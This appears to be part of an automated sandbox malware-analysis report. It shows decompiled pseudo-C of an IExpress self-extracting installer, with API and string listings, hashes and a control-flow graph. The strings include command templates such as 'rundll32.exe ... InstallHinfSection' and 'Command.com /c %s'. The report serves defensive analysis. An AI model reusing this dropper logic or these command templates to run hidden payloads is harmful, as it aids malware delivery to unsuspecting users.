                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									L43:
                                                                                                                                                                                                                                            									_t60 = 0;
                                                                                                                                                                                                                                            									_t140 = 0x4b5;
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									_push(0x10);
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                            									_push(_t60);
                                                                                                                                                                                                                                            									E00A044B9(0, _t140);
                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                            									goto L54;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t155 = _v1556;
                                                                                                                                                                                                                                            									_t92 = _t155;
                                                                                                                                                                                                                                            									if( *_t155 == 0) {
                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0xa09120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa01140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0xa09a34 =  *0xa09a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0xa09a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E00A0171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0xa09a34 =  *0xa09a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E00A01680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E00A01680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E00A06CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}














































                                                                                                                                                                                                                                            0x00a01af3
                                                                                                                                                                                                                                            0x00a01afa
                                                                                                                                                                                                                                            0x00a01b07
                                                                                                                                                                                                                                            0x00a01b09
                                                                                                                                                                                                                                            0x00a01b1a
                                                                                                                                                                                                                                            0x00a01b20
                                                                                                                                                                                                                                            0x00a01b2c
                                                                                                                                                                                                                                            0x00a01b3b
                                                                                                                                                                                                                                            0x00a01b40
                                                                                                                                                                                                                                            0x00a01b2e
                                                                                                                                                                                                                                            0x00a01b2e
                                                                                                                                                                                                                                            0x00a01b33
                                                                                                                                                                                                                                            0x00a01b33
                                                                                                                                                                                                                                            0x00a01b46
                                                                                                                                                                                                                                            0x00a01b4c
                                                                                                                                                                                                                                            0x00a01b52
                                                                                                                                                                                                                                            0x00a01b57
                                                                                                                                                                                                                                            0x00a01b5d
                                                                                                                                                                                                                                            0x00a01b61
                                                                                                                                                                                                                                            0x00a01b9f
                                                                                                                                                                                                                                            0x00a01b9f
                                                                                                                                                                                                                                            0x00a01bb1
                                                                                                                                                                                                                                            0x00a01bc2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01b63
                                                                                                                                                                                                                                            0x00a01b63
                                                                                                                                                                                                                                            0x00a01b65
                                                                                                                                                                                                                                            0x00a01b68
                                                                                                                                                                                                                                            0x00a01b68
                                                                                                                                                                                                                                            0x00a01b6a
                                                                                                                                                                                                                                            0x00a01b6b
                                                                                                                                                                                                                                            0x00a01b6f
                                                                                                                                                                                                                                            0x00a01b74
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01b76
                                                                                                                                                                                                                                            0x00a01b7b
                                                                                                                                                                                                                                            0x00a01b86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01b8c
                                                                                                                                                                                                                                            0x00a01b8c
                                                                                                                                                                                                                                            0x00a01b98
                                                                                                                                                                                                                                            0x00a01bc7
                                                                                                                                                                                                                                            0x00a01bc9
                                                                                                                                                                                                                                            0x00a01bcc
                                                                                                                                                                                                                                            0x00a01bd3
                                                                                                                                                                                                                                            0x00a01d75
                                                                                                                                                                                                                                            0x00a01d76
                                                                                                                                                                                                                                            0x00a01d78
                                                                                                                                                                                                                                            0x00a01d7f
                                                                                                                                                                                                                                            0x00a01e05
                                                                                                                                                                                                                                            0x00a01e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01e12
                                                                                                                                                                                                                                            0x00a01e1b
                                                                                                                                                                                                                                            0x00a01e73
                                                                                                                                                                                                                                            0x00a01e21
                                                                                                                                                                                                                                            0x00a01e21
                                                                                                                                                                                                                                            0x00a01e28
                                                                                                                                                                                                                                            0x00a01e37
                                                                                                                                                                                                                                            0x00a01e3e
                                                                                                                                                                                                                                            0x00a01e52
                                                                                                                                                                                                                                            0x00a01e60
                                                                                                                                                                                                                                            0x00a01e60
                                                                                                                                                                                                                                            0x00a01e3e
                                                                                                                                                                                                                                            0x00a01e79
                                                                                                                                                                                                                                            0x00a01e7b
                                                                                                                                                                                                                                            0x00a01e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01d9b
                                                                                                                                                                                                                                            0x00a01d9b
                                                                                                                                                                                                                                            0x00a01da0
                                                                                                                                                                                                                                            0x00a01da2
                                                                                                                                                                                                                                            0x00a01da5
                                                                                                                                                                                                                                            0x00a01da5
                                                                                                                                                                                                                                            0x00a01da7
                                                                                                                                                                                                                                            0x00a01da8
                                                                                                                                                                                                                                            0x00a01dac
                                                                                                                                                                                                                                            0x00a01dae
                                                                                                                                                                                                                                            0x00a01db4
                                                                                                                                                                                                                                            0x00a01db7
                                                                                                                                                                                                                                            0x00a01db7
                                                                                                                                                                                                                                            0x00a01db9
                                                                                                                                                                                                                                            0x00a01dba
                                                                                                                                                                                                                                            0x00a01dbe
                                                                                                                                                                                                                                            0x00a01dc3
                                                                                                                                                                                                                                            0x00a01dce
                                                                                                                                                                                                                                            0x00a01dd2
                                                                                                                                                                                                                                            0x00a01deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01dd2
                                                                                                                                                                                                                                            0x00a01bf7
                                                                                                                                                                                                                                            0x00a01bfe
                                                                                                                                                                                                                                            0x00a01c07
                                                                                                                                                                                                                                            0x00a01d55
                                                                                                                                                                                                                                            0x00a01d5a
                                                                                                                                                                                                                                            0x00a01d5b
                                                                                                                                                                                                                                            0x00a01d5d
                                                                                                                                                                                                                                            0x00a01d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01c1b
                                                                                                                                                                                                                                            0x00a01c1b
                                                                                                                                                                                                                                            0x00a01c20
                                                                                                                                                                                                                                            0x00a01c2c
                                                                                                                                                                                                                                            0x00a01c33
                                                                                                                                                                                                                                            0x00a01c38
                                                                                                                                                                                                                                            0x00a01c3a
                                                                                                                                                                                                                                            0x00a01c3a
                                                                                                                                                                                                                                            0x00a01c40
                                                                                                                                                                                                                                            0x00a01c4b
                                                                                                                                                                                                                                            0x00a01c4b
                                                                                                                                                                                                                                            0x00a01c5d
                                                                                                                                                                                                                                            0x00a01c61
                                                                                                                                                                                                                                            0x00a01dd4
                                                                                                                                                                                                                                            0x00a01dd4
                                                                                                                                                                                                                                            0x00a01dd6
                                                                                                                                                                                                                                            0x00a01ddb
                                                                                                                                                                                                                                            0x00a01ddc
                                                                                                                                                                                                                                            0x00a01dde
                                                                                                                                                                                                                                            0x00a01d64
                                                                                                                                                                                                                                            0x00a01d64
                                                                                                                                                                                                                                            0x00a01d67
                                                                                                                                                                                                                                            0x00a01d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01c67
                                                                                                                                                                                                                                            0x00a01c67
                                                                                                                                                                                                                                            0x00a01c6d
                                                                                                                                                                                                                                            0x00a01c72
                                                                                                                                                                                                                                            0x00a01c74
                                                                                                                                                                                                                                            0x00a01c74
                                                                                                                                                                                                                                            0x00a01c8e
                                                                                                                                                                                                                                            0x00a01c99
                                                                                                                                                                                                                                            0x00a01cc0
                                                                                                                                                                                                                                            0x00a01cf8
                                                                                                                                                                                                                                            0x00a01d07
                                                                                                                                                                                                                                            0x00a01d23
                                                                                                                                                                                                                                            0x00a01d09
                                                                                                                                                                                                                                            0x00a01d14
                                                                                                                                                                                                                                            0x00a01d1b
                                                                                                                                                                                                                                            0x00a01d1b
                                                                                                                                                                                                                                            0x00a01d2b
                                                                                                                                                                                                                                            0x00a01d2d
                                                                                                                                                                                                                                            0x00a01d2d
                                                                                                                                                                                                                                            0x00a01d38
                                                                                                                                                                                                                                            0x00a01d39
                                                                                                                                                                                                                                            0x00a01d46
                                                                                                                                                                                                                                            0x00a01cc2
                                                                                                                                                                                                                                            0x00a01cc2
                                                                                                                                                                                                                                            0x00a01ccc
                                                                                                                                                                                                                                            0x00a01cce
                                                                                                                                                                                                                                            0x00a01cce
                                                                                                                                                                                                                                            0x00a01cdb
                                                                                                                                                                                                                                            0x00a01ce6
                                                                                                                                                                                                                                            0x00a01cee
                                                                                                                                                                                                                                            0x00a01cee
                                                                                                                                                                                                                                            0x00a01e89
                                                                                                                                                                                                                                            0x00a01e91
                                                                                                                                                                                                                                            0x00a01e92
                                                                                                                                                                                                                                            0x00a01e94
                                                                                                                                                                                                                                            0x00a01e97
                                                                                                                                                                                                                                            0x00a01ea4
                                                                                                                                                                                                                                            0x00a01ea4
                                                                                                                                                                                                                                            0x00a01c61
                                                                                                                                                                                                                                            0x00a01c07
                                                                                                                                                                                                                                            0x00a01bd3
                                                                                                                                                                                                                                            0x00a01b7b

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A01BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A01BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A01C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00A01C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A01140,00000000,00000008,?), ref: 00A01CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00A01D1B
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-819679500
                                                                                                                                                                                                                                            • Opcode ID: 420de1355c21fd516cc31ac19eb7bfd20642c1e7d5cd653fb2533fe59dbdc4fe
                                                                                                                                                                                                                                            • Instruction ID: 4fc84913895064dcc2f92de03691b1b2812443ce753c9db7a84091711964e7ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 420de1355c21fd516cc31ac19eb7bfd20642c1e7d5cd653fb2533fe59dbdc4fe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BA14670A0021C6BEB24DB24FC84FFA77A9EB55310F144799F595A32D1EBB09E86CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 450 a02f1d-a02f3d 451 a02f6c-a02f73 call a05164 450->451 452 a02f3f-a02f46 450->452 459 a03041 451->459 460 a02f79-a02f80 call a055a0 451->460 454 a02f48 call a051e5 452->454 455 a02f5f-a02f66 call a03a3f 452->455 461 a02f4d-a02f4f 454->461 455->451 455->459 464 a03043-a03053 call a06ce0 459->464 460->459 468 a02f86-a02fbe GetSystemDirectoryA call a0658a LoadLibraryA 460->468 461->459 465 a02f55-a02f5d 461->465 465->451 465->455 472 a02fc0-a02fd4 GetProcAddress 468->472 473 a02ff7-a03004 FreeLibrary 468->473 472->473 474 a02fd6-a02fee DecryptFileA 472->474 475 a03006-a0300c 473->475 476 a03017-a03024 SetCurrentDirectoryA 473->476 474->473 489 a02ff0-a02ff5 474->489 475->476 477 a0300e call a0621e 475->477 478 a03054-a0305a 476->478 479 a03026-a0303c call a044b9 call a06285 476->479 485 a03013-a03015 477->485 483 a03065-a0306c 478->483 484 a0305c call a03b26 478->484 479->459 486 a0307c-a03089 483->486 487 a0306e-a03075 call a0256d 483->487 491 a03061-a03063 484->491 485->459 485->476 493 a030a1-a030a9 486->493 494 a0308b-a03091 486->494 496 a0307a 487->496 489->473 491->459 491->483 499 a030b4-a030b7 493->499 500 a030ab-a030ad 493->500 494->493 497 a03093 call a03ba2 494->497 496->486 503 a03098-a0309a 497->503 499->464 500->499 502 a030af call a04169 500->502 502->499 503->459 505 a0309c 503->505 505->493
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A02F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0xa08a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E00A05164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E00A06CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E00A055A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E00A0658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0xa0a288("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0xa08a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0xa08a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0xa08d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0xa08d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t41 =  *0xa09a40; // 0x3, executed
                                                                                                                                                                                                                                            										_t26 = E00A0256D(_t41); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0xa08a24; // 0x0
                                                                                                                                                                                                                                            									 *0xa09a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0xa08a38;
                                                                                                                                                                                                                                            										if( *0xa08a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E00A04169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0xa09a30 - _t22; // 0x0
                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E00A03BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0xa08a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E00A03B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E00A044B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t59 =  *0xa09a30 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A0621E(); // executed
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0xa08a24;
                                                                                                                                                                                                                                            				if( *0xa08a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E00A03A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A051E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0xa08a38;
                                                                                                                                                                                                                                            				if( *0xa08a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00a02f1d
                                                                                                                                                                                                                                            0x00a02f28
                                                                                                                                                                                                                                            0x00a02f2f
                                                                                                                                                                                                                                            0x00a02f3d
                                                                                                                                                                                                                                            0x00a02f6c
                                                                                                                                                                                                                                            0x00a02f6c
                                                                                                                                                                                                                                            0x00a02f71
                                                                                                                                                                                                                                            0x00a02f73
                                                                                                                                                                                                                                            0x00a03041
                                                                                                                                                                                                                                            0x00a03041
                                                                                                                                                                                                                                            0x00a03043
                                                                                                                                                                                                                                            0x00a03053
                                                                                                                                                                                                                                            0x00a03053
                                                                                                                                                                                                                                            0x00a02f79
                                                                                                                                                                                                                                            0x00a02f80
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02f86
                                                                                                                                                                                                                                            0x00a02f86
                                                                                                                                                                                                                                            0x00a02f93
                                                                                                                                                                                                                                            0x00a02f9e
                                                                                                                                                                                                                                            0x00a02fa0
                                                                                                                                                                                                                                            0x00a02fa6
                                                                                                                                                                                                                                            0x00a02fb8
                                                                                                                                                                                                                                            0x00a02fba
                                                                                                                                                                                                                                            0x00a02fbe
                                                                                                                                                                                                                                            0x00a02fc6
                                                                                                                                                                                                                                            0x00a02fcc
                                                                                                                                                                                                                                            0x00a02fd4
                                                                                                                                                                                                                                            0x00a02fd6
                                                                                                                                                                                                                                            0x00a02fd8
                                                                                                                                                                                                                                            0x00a02fe0
                                                                                                                                                                                                                                            0x00a02fe6
                                                                                                                                                                                                                                            0x00a02fee
                                                                                                                                                                                                                                            0x00a02ff0
                                                                                                                                                                                                                                            0x00a02ff5
                                                                                                                                                                                                                                            0x00a02ff5
                                                                                                                                                                                                                                            0x00a02fee
                                                                                                                                                                                                                                            0x00a02fd4
                                                                                                                                                                                                                                            0x00a02ff8
                                                                                                                                                                                                                                            0x00a02ffe
                                                                                                                                                                                                                                            0x00a03004
                                                                                                                                                                                                                                            0x00a03017
                                                                                                                                                                                                                                            0x00a0301c
                                                                                                                                                                                                                                            0x00a03024
                                                                                                                                                                                                                                            0x00a03054
                                                                                                                                                                                                                                            0x00a0305a
                                                                                                                                                                                                                                            0x00a03065
                                                                                                                                                                                                                                            0x00a03065
                                                                                                                                                                                                                                            0x00a0306c
                                                                                                                                                                                                                                            0x00a0306e
                                                                                                                                                                                                                                            0x00a03075
                                                                                                                                                                                                                                            0x00a0307a
                                                                                                                                                                                                                                            0x00a0307a
                                                                                                                                                                                                                                            0x00a0307c
                                                                                                                                                                                                                                            0x00a03081
                                                                                                                                                                                                                                            0x00a03087
                                                                                                                                                                                                                                            0x00a03089
                                                                                                                                                                                                                                            0x00a030a1
                                                                                                                                                                                                                                            0x00a030a1
                                                                                                                                                                                                                                            0x00a030a9
                                                                                                                                                                                                                                            0x00a030ab
                                                                                                                                                                                                                                            0x00a030ad
                                                                                                                                                                                                                                            0x00a030af
                                                                                                                                                                                                                                            0x00a030af
                                                                                                                                                                                                                                            0x00a030ad
                                                                                                                                                                                                                                            0x00a030b6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0308b
                                                                                                                                                                                                                                            0x00a0308b
                                                                                                                                                                                                                                            0x00a03091
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03093
                                                                                                                                                                                                                                            0x00a03098
                                                                                                                                                                                                                                            0x00a0309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0309c
                                                                                                                                                                                                                                            0x00a03089
                                                                                                                                                                                                                                            0x00a0305c
                                                                                                                                                                                                                                            0x00a03061
                                                                                                                                                                                                                                            0x00a03063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03063
                                                                                                                                                                                                                                            0x00a0302b
                                                                                                                                                                                                                                            0x00a03032
                                                                                                                                                                                                                                            0x00a0303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0303c
                                                                                                                                                                                                                                            0x00a03006
                                                                                                                                                                                                                                            0x00a0300c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a0300e
                                                                                                                                                                                                                                            0x00a03015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03015
                                                                                                                                                                                                                                            0x00a02f80
                                                                                                                                                                                                                                            0x00a02f3f
                                                                                                                                                                                                                                            0x00a02f46
                                                                                                                                                                                                                                            0x00a02f5f
                                                                                                                                                                                                                                            0x00a02f5f
                                                                                                                                                                                                                                            0x00a02f64
                                                                                                                                                                                                                                            0x00a02f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02f66
                                                                                                                                                                                                                                            0x00a02f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02f55
                                                                                                                                                                                                                                            0x00a02f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
